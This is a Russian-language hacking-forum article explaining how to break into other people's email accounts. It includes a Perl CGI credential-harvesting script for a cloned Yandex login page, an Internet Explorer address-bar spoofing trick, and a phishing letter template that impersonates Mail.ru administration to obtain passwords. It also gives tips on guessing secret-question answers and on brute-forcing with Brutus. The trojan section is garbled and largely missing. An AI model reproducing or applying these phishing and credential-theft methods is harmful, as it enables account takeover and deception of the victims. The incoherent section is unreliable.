В данной статье я хочу рассказать вам о способах взлома E-mail'a всвязи с очень большим кол-вом сообщений на эту тему:
Рассмотрим несколько способов:
1) Баг в IE + Соц. Инженерия
1) Троян
3) Находчивость
4) Грубая сила
Вариант 1.
Допустим вам известно, что жертва имеет IE и просматривает почту через Web интерфейс, тогда необходимо отправить ей письмо полностью идентичное системе идентификации, например такого вида:
http://mail.yandex.ru/login
Все надо оставить таким же, вот только написать скрипт, который будет вам отсылать пароли на почту например... Этот скрипт выглядит приблизительно так:
&GetFormInput;
$name=$field{'name'};
$pass=$field{'pass'};
sub GetFormInput {
(*fval) = @_ if @_ ;
local ($buf);
if ($ENV{'REQUEST_METHOD'} eq 'POST') {
read(STDIN,$buf,$ENV{'CONTENT_LENGTH'});
}
else {
$buf=$ENV{'QUERY_STRING'};
}
if ($buf eq "") {
return 0 ;
}
else {
@fval=split(/&/,$buf);
foreach $i (0 .. $#fval){
($name,$val)=split (/=/,$fval[$i],2);
$val=~tr/+/ /;
$val=~ s/%(..)/pack("c",hex($1))/ge;
$name=~tr/+/ /;
$name=~ s/%(..)/pack("c",hex($1))/ge;
if (!defined($field{$name})) {
$field{$name}=$val;
}
else {
$field{$name} .= ",$val";
}
}
}
return 1;
}
open (OUTFILE, ">>pass.txt");
print OUTFILE "$name";
print OUTFILE "\n$pass";
print OUTFILE "\n=======END=======\n\n";
close (OUTFILE);
print "Location:
http://your_redirect_URL\n"
А далее необходимо заюзать новый баг в IE с подменой адресной строки... Выглядит это так:
<button onclick="location.href=unescape('
http://www.microsoft.com%01@www.antichat.ru ');" style="font: 8pt verdana, sans-serif;" target="_new">
Проверить баг в IE
Теперь нажав на эту кнопку в адресной строке будет написано
www.microsoft.com , а загрузится наш античат....
Теперь состыковав все эти 3 вещи мы отправляем юзеру письмо, в котором пишем про ошибку аутентификации, а после ввода пароля отправляем его уже на настоящую страницу авторизации...
Смысл этого скрипта состоит в том, что если у вас WinXP + MSIE, то в корне диска С запустив такой скрипт вы сможете найти файл nsd_ru_hello.txt
Но никто не мешает вам переделать этот скрипт под себя и заставить скачиваться заменяя WMPlayer например:-)))
Это один из эффектнейших способов впаривания трояна....
3) Находчивость.
Рассмотрим момент, ничего не работает, Тогда идем на Секретный вопрос и смотрим туда.
Вариант 1. Нормальный вопрос: "Номер телефона"
Находим icq этого человека и если он порядочный ламер, то он ввел туда все, что нужно в том числе и свой номер телефона....
Вариант 2. Ненормальный вопрос: "а"
Вот тут уже все сложнее, но мне повезло в этом плане, и ответом на вопрос было "б"....
4) Грубая сила.
Нет смысла рассуждать на эту тему, берется программа: Brutus aet2 и устанавливается на перебор пароля по 1 логину...
------------------------------------------------------------
Большинство информации взято с сайта
www.nsd.ru, так что скажем им "большое спасибо"...
Также я взял инфу с хакзоны... Ее разместил dima k-17.
------------------------------------------------------------
Естесственно это далеко не все варианты, но новичкам я рекомендую социальную инженерию...
Пишем письмо от админов (н-р: Администрация Mail.ru или Администрация Yandex.ru) . Адрес должен быть соответствующий, а то юзер догадется, если твой мейл будет ded-makar... Допустим, мы зарегистрировали аккаунт типа
admin@mail.ru, что делаем дальше:
Тему ты выбираешь вроде "Подтверждение аккаунта vasja_pupkin"
Далее мы пишем:
Здравствуйте, Вася Пупкин!
С Вашего почтового ящика
vasja_pupkin@mail.ru происходит рассылка спама. Возможно, кто-то умышленно рассылает спам от Вашего имени, но Вам нужно подтвердить свои права на этот ящик. Для этого Вам необходимо ответить на это письмо, в теме указав свои реквизиты для
vasja_pupkin@mail.ru в формате login;passwd.
С уважением, Администрация Mail.ru
Для убедительности я переводил на английский. В этом случае пароль высылало ок. 70 %.
Как видишь способов придумать можно вагон и маленькую тележку, но главное не переборщить со всем этим делом. Так , однажды, один "умник" написал, что mail.ru похакали и мне срочно нужно выслать пароль. :-)
Че Гевара
Линейный вид
